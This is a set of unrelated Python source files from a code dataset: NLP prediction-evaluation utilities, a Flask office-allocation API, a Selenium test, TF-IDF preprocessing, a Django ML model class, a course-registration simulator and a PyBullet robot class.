)\n lines.append(line[:-1])\n return tags, heads, deps, lines\n\n\ndef read_gold_conllu(gold_file):\n \"\"\"\n Reads in the gold annotation file in CoNLL-U format (all dependencies,\n i.e. 
multiple dependency relations per token, if applicable).\n\n Returns:\n - unlabelled: a list of sets with head token ID's;\n len(unlabelled) = num_tokens(gold_file)\n - labelled: a list of sets with (head, dependency name) pairs;\n len(labelled) = num_tokens(gold_file)\n \"\"\"\n labelled = []\n unlabelled = []\n with open(gold_file, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n if line == \"\\n\":\n continue\n line = line.split(\"\\t\")\n edges = set()\n edges.add((line[6], line[7]))\n if line[8] != \"_\":\n for edge in literal_eval(line[8]):\n edges.add(edge)\n heads = set([str(h) for h, d in edges])\n labelled.append(edges)\n unlabelled.append(heads)\n return unlabelled, labelled\n\n\ndef read_gold_conll2003(gold_file):\n \"\"\"\n Reads in the gold annotation from a file in CoNLL 2003 format.\n\n Returns:\n - gold: a String list containing one sequence tag per token.\n E.g. [B-Kochschritt, L-Kochschritt, U-Zutat, O]\n - lines: a list list containing the original line split at \"\\t\"\n \"\"\"\n gold = []\n lines = []\n with open(gold_file, encoding=\"utf-8\") as f:\n for line in f:\n if line == \"\\n\":\n continue\n line = line.strip().split(\"\\t\")\n gold.append(line[3])\n lines.append(line)\n return gold, lines\n\n\ndef taggingcolumns2conllu(outfile, tokens, tags, pos_tags=None, filemode=\"w\"):\n \"\"\"\n Takes tokens and tags and writes them into a tsv file in CoNLL-U format.\n Domain-specific tags are required, POS tags are optional.\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n\n All tokens are annotated with HEAD = 0 and DEPREL = root, so the parser's\n dataset reader can read in the file without errors.\n \"\"\"\n\n # double-check input\n if len(tokens) != len(tags):\n raise ValueError(\n \"Will not zip tokens and tags: number of tokens in tokens and \"\n \"number of tags in tags must be the same. Got \",\n len(tokens),\n \"and\",\n len(tags),\n )\n # write file: one token per line\n with open(outfile, filemode, encoding=\"utf-8\") as o:\n if pos_tags:\n for (i, (_token, _pos, _tag)) in enumerate(zip(tokens, pos_tags, tags)):\n # need to start counting from 1 bc 0 is used for None-node\n o.write(\n str(i + 1)\n + \"\\t\"\n + _token\n + \"\\t_\\t\"\n + _pos\n + \"\\t\"\n + _tag\n + \"\\t_\\t0\\troot\\t_\\t_\"\n )\n o.write(\"\\n\")\n o.write(\"\\n\")\n else:\n for (i, (_token, _tag)) in enumerate(zip(tokens, tags)):\n # need to start counting from 1 bc 0 is used for None-node\n o.write(\n str(i + 1)\n + \"\\t\"\n + _token\n + \"\\t_\\t_\\t\"\n + _tag\n + \"\\t_\\t0\\troot\\t_\\t_\"\n )\n o.write(\"\\n\")\n o.write(\"\\n\")\n\n\ndef parsercolumns2conllu(outfile, tokens, tags, heads, deps, pos_tags=None):\n \"\"\"\n Takes tokens, tags and dependency relations and writes them into a tsv file in CoNLL-U format.\n Domain-specific tags are required, POS tags are optional.\n\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n \"\"\"\n # double-check input\n if len(tokens) != len(tags):\n raise ValueError(\n f\"Will not zip tokens, tags, heads and deps: number of tokens \"\n f\"in tokens and number of tags in tags must be the same. 
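`read_gold_conllu` above recovers extra edges from the DEPS column with `ast.literal_eval`, which safely parses a Python-literal string without executing code. The same step in isolation; the edge labels here are made up for illustration.

from ast import literal_eval

deps_column = "[('3', 'tool'), ('5', 'dobj')]"  # hypothetical 9th-column value
edges = set(literal_eval(deps_column))
heads = {head for head, _label in edges}
assert heads == {"3", "5"}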
\"\n            f\"Got {len(tokens)}, {len(tags)}, {len(heads)} and {len(deps)}.\"\n        )\n    # write file: one token per line\n    with open(outfile, \"w\", encoding=\"utf-8\") as o:\n        if pos_tags:\n            for (i, (_token, _pos, _tag, _head, _dep)) in enumerate(\n                zip(tokens, pos_tags, tags, heads, deps)\n            ):\n                # need to start counting from 1 bc 0 is used for None-node\n                o.write(\n                    str(i + 1)\n                    + \"\\t\"\n                    + _token\n                    + \"\\t_\\t\"\n                    + _pos\n                    + \"\\t\"\n                    + _tag\n                    + \"\\t_\\t\"\n                    + _head\n                    + \"\\t\"\n                    + _dep\n                    + \"\\t_\\t_\"\n                )\n                o.write(\"\\n\")\n        else:\n            for (i, (_token, _tag, _head, _dep)) in enumerate(\n                zip(tokens, tags, heads, deps)\n            ):\n                # need to start counting from 1 bc 0 is used for None-node\n                o.write(\n                    str(i + 1)\n                    + \"\\t\"\n                    + _token\n                    + \"\\t_\\t_\\t\"\n                    + _tag\n                    + \"\\t_\\t\"\n                    + _head\n                    + \"\\t\"\n                    + _dep\n                    + \"\\t_\\t_\"\n                )\n                o.write(\"\\n\")\n\n\ndef execute_analysis(args):\n    \"\"\"\n    Reads in a gold annotated file and predicted data.\n    Writes a new file where the first columns repeat the gold annotated file.\n    The last column contains all predictions that do not match the gold annotation.\n    If the prediction was correct, the last column in that line stays empty.\n    \"\"\"\n\n    # Read in prediction for the sequence tagging task\n    # and find out whether the predicted items are tags or edges\n    pred_tags, model_type = read_prediction_tags(args.pred_file)\n\n    if model_type == \"parser\":\n        if args.conllu:\n            # Print feedback to console\n            logging.info(\n                \"Comparing edges in \"\n                + args.pred_file\n                + \"\\nto edges in \"\n                + args.gold_file\n                + \",\\nwriting results into \"\n                + args.out\n            )\n\n            # Read in gold_file\n            gold_tags, gold_heads, gold_deps, goldlines = _read_gold_conllu_simplified(\n                args.gold_file\n            )\n            # Read in prediction for the parsing task\n            pred_heads, pred_deps = read_prediction_dependencies(args.pred_file)\n            # Combine prediction and expectation into a tsv file\n            write_with_misjudgements(\n                zip(gold_heads, gold_deps),\n                zip(pred_heads, pred_deps),\n                goldlines,\n                args.out,\n            )\n        elif args.conll2003:\n            raise ValueError(\n                f\"The data in {args.pred_file} was predicted by a parser. Can't be \"\n                f\"evaluated against a file in CoNLL-2003 format (used flag '-c3' for gold file).\"\n            )\n\n    elif model_type == \"tagger\":\n        # Print feedback to console\n        logging.info(\n            \"Comparing tags in \"\n            + args.pred_file\n            + \"\\nto tags in \"\n            + args.gold_file\n            + \",\\nwriting results into \"\n            + args.out\n        )\n\n        if args.conllu:\n            # Read in gold_file in CoNLL-U format\n            gold_tags, gold_heads, gold_deps, goldlines = _read_gold_conllu_simplified(\n                args.gold_file\n            )\n        elif args.conll2003:\n            # Read in gold file in CoNLL-2003 format (doesn't double-check whether args.gold_file actually\n            # is written in CoNLL-2003 format)\n            gold_tags, goldlines = read_gold_conll2003(args.gold_file)\n        # Combine prediction and expectation into a tsv file\n        write_with_misjudgements(gold_tags, pred_tags, goldlines, args.out)\n\n\ndef execute_tagger2c(args):\n    \"\"\"\n    Takes a prediction file generated by our tagger (i.e. 
json file) and writes a tsv file in CoNLL-U format.\n\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n Realised columns (all other columns contain dummy values): ID FORM _ (UPOS) XPOS _ _ _ _ _\n \"\"\"\n if args.sent:\n lineflag = False\n with open(args.pred_file, encoding=\"utf-8\") as f:\n for line in f:\n lineflag = True\n j = json.loads(line)\n tokens = j[\"words\"]\n tags = j[\"tags\"]\n taggingcolumns2conllu(args.out, tokens, tags, filemode=\"a\")\n if not lineflag:\n raise IOError(\n \"Empty file\"\n ) # Due to formatting and other errors in Lin et al. (2020)'s data,\n # some recipes do not contain text, leaving us with empty files.\n # Empty files could cause further errors; therefore, we want to delete them from the dataset.\n else:\n tokens = read_prediction_tokens(args.pred_file)\n tags, _ = read_prediction_tags(args.pred_file)\n taggingcolumns2conllu(args.out, tokens, tags)\n\n\ndef execute_parse2c(args):\n \"\"\"\n Takes a prediction file generated by our parser (i.e. json file) and writes a tsv file in CoNLL-U format.\n\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n Realised columns (all other columns contain dummy values): ID FORM _ (UPOS) XPOS _ HEAD DEPREL DEPS _\n \"\"\"\n tokens = read_prediction_tokens(args.pred_file)\n tags, _ = read_prediction_tags(args.pred_file)\n heads, deps = read_prediction_dependencies(args.pred_file)\n parsercolumns2conllu(args.out, tokens, tags, heads, deps)\n\n\nif __name__ == \"__main__\":\n\n # parser for command line arguments\n arg_parser = argparse.ArgumentParser(\n description=\"\"\"Has three modes. \n 1. Analysis mode (default): Takes AllenNLP prediction for sequence \n tags and complementary annotated (gold) file. \n Prints all columns of the annotated file plus an extra column \n for wrongly predicted tokens into a tab separated file.\n 2. tagger prediction2conllu: takes a tagging prediction file (json format) and writes a \n CoNLL-U file with the given columns.\n 3. parser prediction2conllu: takes a parsing prediction file (json format) and writes a \n CoNLL-U file with the given columns.\"\"\"\n )\n arg_parser.add_argument(\n \"-m\",\n \"--mode\",\n dest=\"mode\",\n help=\"\"\"Specify mode as described above. Choose one of the following: {analysis, tagger_p2c, parser_p2c}.\"\"\",\n )\n arg_parser.add_argument(\n \"-p\",\n \"--prediction\",\n metavar=\"PRED_FILE\",\n dest=\"pred_file\",\n required=True,\n help=\"\"\"Prediction file in json format. Output of AllenNLP parser.\"\"\",\n )\n arg_parser.add_argument(\n \"-c3\",\n \"--conll2003\",\n dest=\"conll2003\",\n metavar=\"GOLD_FILE\",\n help=\"\"\"Annotated (gold) file in CoNLL2003 format.\"\"\",\n )\n arg_parser.add_argument(\n \"-cu\",\n \"--conllu\",\n dest=\"conllu\",\n metavar=\"GOLD_FILE\",\n help=\"\"\"Annotated (gold) file in CoNLL-U format.\"\"\",\n )\n arg_parser.add_argument(\n \"-o\",\n \"--output_file\",\n dest=\"out\",\n metavar=\"OUTPUT_FILE\",\n help=\"\"\"Name of the output file. Default: .tsv in evaluation mode\"\"\",\n )\n arg_parser.add_argument(\n \"--single-sentences\",\n dest=\"sent\",\n const=True,\n default=False,\n action=\"store_const\",\n help=\"\"\"Implemented only for mode tagger_p2c.\"\"\",\n )\n args = arg_parser.parse_args()\n\n args.debug = False\n\n # Determine file names in analysis mode\n if args.mode == \"analysis\" or not args.mode:\n if args.out == None:\n args.out = str(args.pred_file)[:-4] + \"tsv\"\n if args.conll2003:\n if args.conllu:\n raise IOError(\n \"Two annotated files provided. 
Please, specify only one annotated file.\"\n )\n else:\n args.gold_file = args.conll2003\n else:\n if args.conllu:\n args.gold_file = args.conllu\n else:\n raise IOError(\n \"No annotated file provided. Please, specify an annotated file with -c3 or -cu flags.\"\n )\n\n # Determine file names for pred2conllu\n elif args.mode.endswith(\"p2c\"):\n if args.out == None:\n args.out = str(args.pred_file)[:-4] + \"conllu\"\n\n else:\n raise RuntimeError(\n \"Unexpected mode. Please specify one of {analysis, tagger_p2c, parser_p2c}.\"\n )\n\n #########################\n #### Start execution ####\n #########################\n\n if args.mode == \"analysis\" or not args.mode:\n execute_analysis(args)\n elif args.mode == \"tagger_p2c\":\n execute_tagger2c(args)\n elif args.mode == \"parser_p2c\":\n execute_parse2c(args)\n else:\n raise RuntimeError(\n \"Unexpected mode. Please specify one of {analysis, tagger_p2c, parser_p2c}.\"\n )\n","repo_name":"interactive-cookbook/ara","sub_path":"Alignment_Model/preprocessing/read_prediction.py","file_name":"read_prediction.py","file_ext":"py","file_size_in_byte":18259,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"9417777361","text":"from flask import Flask, request, render_template\nfrom flask_cors import CORS\nfrom itertools import chain, combinations, product\nimport pymongo\nfrom pymongo import MongoClient\nimport json\nimport copy\nimport os\nfrom bson import json_util, ObjectId\n# app.config[\"DEBUG\"] = True\napp = Flask(__name__)\n\n# get token from token.txt file so we can auth into mongo server\n# token = open(\"token.txt\", \"r\")\n\n# cluster = MongoClient(token.read())\n# db = cluster[\"Office\"]\n# collection = db[\"company\"]\n\n# token.close()\n\n# app.config[\"DEBUG\"] = True\ncors = CORS(app)\n\n# Returns the powerset of the list (code taken from itertools documentation)\ndef powerset(iterable):\n s = list(iterable)\n return list(chain.from_iterable(combinations(s, r) for r in range(len(s)+1)))\n\n# Given a powerset, returns the sets that contain the team\ndef x(subsets, team):\n temp = subsets[:]\n for subset in subsets:\n if team not in subset:\n temp.remove(subset)\n subsets = temp\n return subsets\n\ndef like_score_calculation(like_score, building):\n count = 0\n for floor in building:\n count += len(floor) * (len(floor) - 1) / 2\n if count == 0:\n return 0\n else:\n return (like_score / count) / 2 \n\n@app.route(\"/tinyoffice/generate\", methods = [\"GET\"])\ndef generate():\n\n # \"floors\": [\n # {\n # \"id\": TK,\n # \"name\": \"TK\",\n # \"capacity\": TK\n # },\n # {\n # ...\n # }\n # ]\n # \"teams\": [\n # {\n # \"id\": TK,\n # \"name\": \"TK\",\n # \"strength\": TK,\n # \"preferred\": [TK],\n # \"noway\": [TK]\n # },\n # {\n # ...\n # }\n # ]\n\n request_data = json.loads(request.args.get(\"params\"))\n request_floors = request_data[\"floors\"]\n request_teams = request_data[\"teams\"]\n\n num_teams = len(request_teams)\n teams = []\n for i in range(num_teams):\n teams.append(list(range(1, num_teams + 1)))\n team_names = {request_teams[i][\"name\"] : i + 1 for i in range(len(teams))}\n team_ids_end = {i + 1 : request_teams[i][\"id\"] for i in range(len(teams))}\n strengths = {i + 1: request_teams[i][\"strength\"] for i in range(len(teams))}\n prefers = {i + 1: [team_names[temp] for temp in request_teams[i][\"preferred\"]] for i in range(len(teams))}\n no_ways = {i + 1: [team_names[temp] for temp in request_teams[i][\"noway\"]] for i in range(len(teams))}\n\n num_floors = 
len(request_floors)\n floors = {i + 1: request_floors[i][\"capacity\"] for i in range(num_floors)}\n total_space = sum(floors.values())\n\n # print(f\"request_data: {request_data}\")\n # print()\n # print(f\"request_teams: {request_teams}\")\n # print()\n # print(f\"request_floors: {request_floors}\")\n # print()\n # print(f\"num_teams: {num_teams}\")\n # print(f\"teams: {teams}\")\n # print(f\"team names: {team_names}\")\n # print(f\"team ids: {team_ids_end}\")\n # print(f\"strengths: {strengths}\")\n # print(f\"prefers: {prefers}\")\n # print(f\"no_ways: {no_ways}\")\n # print()\n # print(f\"num_floors: {num_floors}\")\n # print(f\"floors: {floors}\")\n # print(f\"total_space: {total_space}\")\n\n #print()\n #print(teams)\n #print()\n for i in range(1, num_teams + 1):\n #print(f\"i: {i}\")\n nos = no_ways[i]\n for no in nos:\n try:\n #print(f\"Removing {no} from team {i}.\")\n teams[i - 1].remove(no)\n #print(teams)\n except:\n continue\n if i in teams[no - 1]:\n #print(f\"Removing {i} from team {no}.\")\n teams[no - 1].remove(i)\n #print(teams)\n\n # floors_final is the list of all possible teams on all floors\n # floors_final[index] is the list of all possible teams on the indexth floor (starting from index = 0)\n # floors_final[index][i] is the list of all possible teams on the indexth floor for the ith team (starting from index = 0, i = 0)\n floors_final = []\n for i in range(num_floors):\n floors_final.append(teams[:])\n subsets = []\n temp_floor = []\n temp_subsets = []\n strength_sum = 0\n #print(floors_final)\n\n for index, floor in enumerate(floors_final):\n for i in range(num_teams):\n temp_floor = floors_final[index][i]\n subsets = x(powerset(temp_floor), i + 1)\n temp_subsets = subsets[:]\n for subset in subsets:\n invalid = False\n strength_sum = 0\n for element in subset:\n strength_sum += strengths[element]\n if element in chain(*[no_ways[temp] for temp in subset]):\n invalid = True\n if invalid == True or strength_sum > floors[index + 1] or strength_sum < floors[index + 1] * 0.25:\n temp_subsets.remove(subset)\n invalid = False\n subsets = temp_subsets\n floors_final[index][i] = subsets\n #print(f\"FLOOR {index}\")\n #for i in range(num_teams):\n #print(f\"Team {i + 1} can be with {floors_final[index][i]}\")\n #print(floors_final)\n\n all_combinations = []\n floor_combinations = []\n #print(floors_final)\n #print(\"ALL POSSIBLE FLOOR COMBINATIONS\")\n for index_floor, floor in enumerate(floors_final):\n #print(f\"------FLOOR {index_floor}------\")\n floor_combinations = []\n for team in floor:\n if team != []:\n for combination in team:\n #print(f\"\\t{combination}\")\n floor_combinations.append(combination)\n all_combinations.append(floor_combinations)\n\n buildings = set(product(*all_combinations))\n\n scores = []\n\n for building in buildings.copy():\n teams_exist = [False] * num_teams\n duplicate = False\n space_score = 0\n like_score = 0\n number_score = 0\n total_score = 0\n for floor in building:\n for team in floor:\n if teams_exist[team - 1] == True:\n buildings.remove(building)\n duplicate = True\n break\n else:\n teams_exist[team - 1] = True\n space_score += strengths[team]\n if team in chain(*[prefers[temp] for temp in floor]):\n like_score += 1\n number_score += 1\n if duplicate == True:\n break\n\n if duplicate == False:\n space_score = space_score / total_space\n number_score = number_score / num_teams\n like_score = like_score_calculation(like_score, building)\n total_score = (space_score ** 2 + number_score ** 2 + like_score ** 2) ** (1/2)\n 
scores.append(building + (space_score, number_score, like_score, total_score))\n\n    scores.sort(key = lambda x: x[-1])\n    #print(scores[-1])\n    if scores == []:\n        return {\"error\": \"No matches found.\"}\n    else:\n        #print({f\"{request_floors[i]['id']}\": scores[-1][i] for i in range(num_floors)})\n        return {f\"{request_floors[i]['id']}\": [team_ids_end[temp] for temp in scores[-1][i]] for i in range(num_floors)}\n\n    # ((7,), (2, 3), (1, 11), (4,), (6, 10), 0.9655172413793104, 0.7272727272727273, 1.0, 1.5688050112220524)\n\n# @app.route(\"/tinyoffice/save\", methods = [\"GET\"])\n# def save():\n#     request_data = json.loads(request.args.get(\"params\"))\n#     request_floors = request_data[\"floors\"]\n#     request_teams = request_data[\"teams\"]\n#     request_total = {\"floors\": request_floors, \"teams\": request_teams}\n#     insertion = db.company.insert_one(request_total)\n#     return {\"key\": str(insertion.inserted_id)}\n\n# @app.route(\"/tinyoffice/load\", methods = [\"GET\"])\n# def load():\n#     companyID = request.args.get(\"key\")\n#     data = db.company.find_one(ObjectId(companyID))\n#     return str(data)\n\n\nif __name__ == '__main__':\n    from waitress import serve\n    serve(app, host=\"localhost\", port=6939)\n    \n","repo_name":"TheElliotM/tinyoffice","sub_path":"api/tinyoffice_api.py","file_name":"tinyoffice_api.py","file_ext":"py","file_size_in_byte":8046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"41991358579","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\n\nclass AutoComplete():\n\n    def test(self):\n        baseUrl = \"http://www.southwest.com\"\n        driverLocation = \"chromedriver.exe\"\n        driver = webdriver.Chrome(driverLocation)\n        driver.get(baseUrl)\n        driver.maximize_window()\n        driver.implicitly_wait(3)\n\n        # Send Partial Data\n        cityField = driver.find_element_by_id(\"LandingAirBookingSearchForm_originationAirportCode\")\n        cityField.clear()\n        cityField.send_keys(\"New York\")\n        time.sleep(3)\n        # Find the item and click\n        itemToSelect = driver.find_element_by_xpath(\"//ul[@id='LandingAirBookingSearchForm_originationAirportCode']//li[contains(text(),'NJ - EWR')]\")\n        itemToSelect.click()\n\n        time.sleep(3)\n        driver.quit()\n\nchromeTest = AutoComplete()\nchromeTest.test()","repo_name":"ChrisStreadbeck/Selenium-automation-practice","sub_path":"AutoComplete.py","file_name":"AutoComplete.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6317746041","text":"import pandas as pd\nimport numpy as np\nfrom abc import ABC, abstractmethod\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer, TfidfTransformer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.svm import LinearSVC\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom sklearn.metrics import roc_auc_score\nfrom scipy.sparse import csr_matrix, hstack, vstack\n\n\n\n\ndef tfidf_data_process(train_sentence, test_sentence, word_ngram, word_max, word_min_df=1, word_max_df=1.0,\n                       char_ngram=(0,0), char_max=100000, char_min_df=1, char_max_df=1.0):\n    \"\"\"\n    Params:\n        train_sentence: pd.Series. Usually the sentence column of a dataframe.\n            e.g. train['comment_text']\n        test_sentence: pd.Series. Usually the sentence column of a dataframe.\n            e.g. 
test['comment_text']\n    \n    word_ngram, word_max, word_min_df, word_max_df, char_ngram, char_max, char_min_df, char_max_df: tfidf params\n\n    Returns: x_train: sparse matrix\n            y_train: DataFrame (containing all label columns)\n            x_test: sparse matrix\n            data_id: str, represents params\n    \"\"\" \n    data_id = 'tfidf_word_{}_{}_{}_{}'.format(word_ngram, word_max, word_min_df, word_max_df)\n    \n    word_vectorizer = TfidfVectorizer(ngram_range=word_ngram, #1,3\n                                      strip_accents='unicode',\n                                      max_features=word_max,\n                                      min_df = word_min_df,\n                                      max_df = word_max_df,\n                                      analyzer='word',\n                                      stop_words='english',\n                                      sublinear_tf=True,\n                                      token_pattern=r'\\w{1,}')\n    print('fitting word')\n    word_vectorizer.fit(train_sentence.values)\n    print('transforming train word')\n    train_word = word_vectorizer.transform(train_sentence.values)\n    print('transforming test word')\n    test_word = word_vectorizer.transform(test_sentence.values)\n\n    # NOTE: relies on `train` and `label_cols` being defined at module level by the caller\n    y_train = train[label_cols]\n\n    if char_ngram == (0,0):\n        print('Done')\n        return (train_word, y_train, test_word, data_id)\n\n    else:\n        data_id = '{}_char_{}_{}_{}_{}'.format(data_id, char_ngram, char_max, char_min_df, char_max_df)\n\n        char_vectorizer = TfidfVectorizer(ngram_range=char_ngram, #2,5\n                                          strip_accents='unicode',\n                                          max_features=char_max, #200000\n                                          min_df = char_min_df,\n                                          max_df = char_max_df,\n                                          analyzer='char',\n                                          sublinear_tf=True)\n\n        print('fitting char')\n        # fit char n-grams on the same training sentences that are transformed below\n        char_vectorizer.fit(train_sentence.values)\n        print('transforming train char')\n        train_char = char_vectorizer.transform(train_sentence.values)\n        print('transforming test char')\n        test_char = char_vectorizer.transform(test_sentence.values)\n\n        x_train = hstack((train_char, train_word), format='csr')\n        x_test = hstack((test_char, test_word), format='csr')\n\n        print('Done')\n        return (x_train, y_train, x_test, data_id)\n","repo_name":"wluo-personal/Kaggle","sub_path":"toxic/sc/stacking/tfidf_data.py","file_name":"tfidf_data.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"42834603684","text":"import collections\nimport jsonfield\nimport shutil\nimport os.path\n\nfrom django.db import models\nfrom django.utils.crypto import get_random_string\n\nimport analitico\n\nfrom analitico import logger\nfrom analitico.factory import Factory\nfrom analitico.constants import ACTION_TRAIN\nfrom analitico.status import STATUS_RUNNING, STATUS_COMPLETED, STATUS_FAILED\nfrom analitico.exceptions import AnaliticoException\nfrom analitico.utilities import read_json, id_generator\n\nfrom .items import ItemMixin, ItemAssetsMixin\nfrom .workspace import Workspace\nfrom .job import Job\nfrom .notebook import nb_run\n\n##\n## Model - a trained machine learning model (not model in the sense of Django db model)\n##\n\n\ndef generate_model_id():\n    return analitico.MODEL_PREFIX + id_generator()\n\n\nclass Model(ItemMixin, ItemAssetsMixin, models.Model):\n    \"\"\"\n    A trained machine learning model which can be used for inferences.\n    The \"training\" attribute of the model includes all the information on\n    the training data, parameters, scores and performances. The model can also\n    have /data assets like saved CatBoost models, CoreML dumps, etc.\n    Trained models are used as immutables in that once created their data\n    doesn't change. When you run a new training session you create a new\n    model. An endpoint will point to a model to use for predictions. 
When\n    a new model is created, the endpoint is updated to point to the new model.\n    \"\"\"\n\n    # Unique id has a type prefix + random string\n    id = models.SlugField(primary_key=True, default=generate_model_id)\n\n    # Model is always owned by one and only one workspace\n    workspace = models.ForeignKey(Workspace, on_delete=models.CASCADE)\n\n    # Title is text only, does not need to be unique, just descriptive\n    title = models.TextField(blank=True)\n\n    # Description (markdown supported)\n    description = models.TextField(blank=True)\n\n    # Time when created\n    created_at = models.DateTimeField(auto_now_add=True)\n\n    # Time when last updated\n    updated_at = models.DateTimeField(auto_now=True)\n\n    # Additional attributes are stored as json (used by ItemMixin)\n    attributes = jsonfield.JSONField(load_kwargs={\"object_pairs_hook\": collections.OrderedDict}, blank=True, null=True)\n\n    # A model's notebook describes the recipe used for training and predictions\n    notebook = jsonfield.JSONField(load_kwargs={\"object_pairs_hook\": collections.OrderedDict}, blank=True, null=True)\n\n    ##\n    ## Jobs\n    ##\n\n    def run(self, job: Job, factory: Factory, **kwargs):\n        \"\"\" Run job actions on the recipe \"\"\"\n\n        try:\n            if ACTION_TRAIN not in job.action:\n                raise AnaliticoException(f\"Model {self.id} does not know job action {job.action}\")\n\n            # process action runs recipe and creates a trained model\n            job.set_status(STATUS_RUNNING)\n\n            notebook = self.get_notebook()\n            if notebook:\n                # if dataset has a notebook it will be used to process\n                nb_run(notebook_item=self, notebook_name=None, factory=factory, upload=True, job=job)\n                try:\n                    training_path = os.path.join(factory.get_artifacts_directory(), \"metadata.json\")\n                    training = read_json(training_path)\n                except:\n                    logger.warning(\"Model: could not read metadata.json\")\n                    training = {}\n            else:\n                # if dataset does not have a notebook we will run its plugins\n                plugin_settings = self.get_attribute(\"plugin\")\n                if not plugin_settings:\n                    raise AnaliticoException(\"Recipe: no notebook or plugins to train with\", recipe=self)\n\n                plugin = factory.get_plugin(**plugin_settings)\n                training = plugin.run(action=job.action)\n\n            # upload artifacts to model (not to the recipe!)\n            # a recipe has a one to many relation with trained models\n            factory.upload_artifacts(self)\n\n            if training:\n                self.set_attribute(\"training\", training)\n            self.save()\n\n            job.set_status(STATUS_COMPLETED)\n\n        except AnaliticoException as exc:\n            job.set_status(STATUS_FAILED)\n            raise exc\n\n        except Exception as exc:\n            job.set_status(STATUS_FAILED)\n            raise AnaliticoException(f\"Model: an error occurred while training {self.id}\", item=self) from exc\n\n        finally:\n            artifacts = factory.get_artifacts_directory()\n            shutil.rmtree(artifacts, ignore_errors=True)\n","repo_name":"analitico/analitico","sub_path":"source/api/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"17473377893","text":"from CourseManager import CourseManager\r\nfrom FileManager import FileManager\r\nfrom RegisterationManager import RegistrationManager\r\nfrom StudentManager import StudentManager\r\n\r\nsemester = \"SPRING\"\r\ncourse_categories = [\"semester1\", \"semester2\", \"semester3\", \"semester4\", \"semester5\", \"semester6\",\r\n                     \"semester7\", \"semester8\", \"FTE\", \"TE\", \"NTE\"]\r\ncourse_manager = CourseManager()\r\nstudent_manager = StudentManager()\r\n\r\n\r\ndef start_app():\r\n    # create 
courses and schedule them.\r\n course_manager.create_courses(course_categories)\r\n\r\n # write curriculum to file for testing\r\n course_manager.print_schedule()\r\n\r\n # create students and random transcript till now.\r\n student_list = student_manager.create_students()\r\n student_manager.create_transcript(semester, course_manager)\r\n\r\n # write transcript to student's file. BEFORE REGISTRATION\r\n student_manager.print_transcript('BEFORE REGISTRATION', 'w')\r\n\r\n # start to simulate this semester registration.\r\n registration_manager = RegistrationManager(student_list, course_manager)\r\n # select courses randomly for each student to register.\r\n registration_manager.start_registration(semester)\r\n\r\n # registration_manager.print_requested_courses() '''we can write this to file for logging.'''\r\n\r\n # send student selected courses to system and advisor control.\r\n registration_manager.start_to_control()\r\n\r\n # write problems to student's file and analysis file.\r\n problem_records = registration_manager.get_problem_records()\r\n file_manager = FileManager.get_instance()\r\n file_manager.write_analysis_file(problem_records)\r\n file_manager.write_problem_to_student_file(problem_records)\r\n student_manager.print_transcript('AFTER REGISTRATION', 'a')\r\n\r\n\r\nif __name__ == '__main__':\r\n start_app()","repo_name":"turgaytumay/CSE3063F21P1_GRP18","sub_path":"py_iteration/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"40595832349","text":"import importlib.resources as pkg_resources\n\nfrom . import robot\n\n\nclass Turtlebot:\n \"\"\" The turtlebot in the simulated environment \"\"\"\n LEFT_WHEEL = 0\n RIGHT_WHEEL = 1\n\n LIDAR_LINK = 25\n\n def __init__(self, sim, base_position, base_angle=0.):\n \"\"\"The constructor\n\n Parameters\n ----------\n sim : BulletClient\n pybullet simulation client\n base_position : list\n Base position of the robot\n base_angle : float\n base orientation of the robot\n \"\"\"\n self.sim = sim\n self.base_position = base_position\n self.base_orientation = self.sim.getQuaternionFromEuler(\n [0., 0., base_angle]\n )\n\n with pkg_resources.path(robot, 'turtlebot.urdf') as urdf_path:\n self.robot = self.sim.loadURDF(str(urdf_path.resolve()),\n self.base_position,\n self.base_orientation)\n\n def set_velocities(self, left, right):\n \"\"\"Set the velocities on both motors of the robot\n\n Parameters\n ----------\n left : float\n Left wheel velocity\n right : float\n right wheel velocity\n \"\"\"\n self.sim.setJointMotorControlArray(self.robot,\n jointIndices=[self.LEFT_WHEEL,\n self.RIGHT_WHEEL],\n controlMode=self.sim.VELOCITY_CONTROL,\n targetVelocities=[left, right])\n\n def stop(self):\n \"\"\" Stop the robot \"\"\"\n self.set_velocities(0., 0.)\n\n def reset(self, pos=None, angle=None):\n \"\"\"Reset the robot. 
